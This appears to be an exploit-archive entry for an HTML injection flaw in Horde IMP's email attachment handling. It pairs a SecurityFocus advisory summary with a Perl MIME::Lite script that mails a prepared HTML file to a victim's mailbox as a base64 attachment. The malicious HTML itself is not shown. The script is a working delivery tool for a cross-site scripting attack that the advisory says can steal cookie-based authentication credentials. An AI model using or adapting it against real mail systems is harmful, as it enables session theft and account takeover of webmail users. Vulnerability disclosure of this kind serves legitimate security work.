Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection

source: https://www.securityfocus.com/bid/15730/info

Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

Reports indicate this issue is only present when viewing IMP content with the Microsoft Internet Explorer Web browser. 

#
# MIME::Liet SMTP client by C3PO
#
   use strict;
   use MIME::Base64;
   use MIME::Lite;
#----------------------------------------------------
#                    load_file
#----------------------------------------------------
   sub load_file{
      my($file) = shift;
      my($Body);
      open(IN, $file) || die("Can't open $file $!");
      binmode IN;
      read(IN, $Body, -s $file);
      close(IN);
      return $Body;
  }
#----------------------------------------------------
#                      main
#----------------------------------------------------
   my $c = load_file('\Xploits\horder\passed.htm'); #content
   my $m = MIME::Lite->new(
                 From    =>'[email protected]',
                 To      =>'[email protected]',
                 Subject =>'Horde',
                 Date    =>"Tue, 17 Dec 2002 22:00:02 +0300",
                 Type    =>"text/html",
                 Data    => $c,
                 Filename=>"horde.html",
                 Encoding =>'base64'
                 );
  $m->attr('content-type.charset' => 'windows-1251'); #not necessary
  $m->send("smtp","smtp.domain.zone");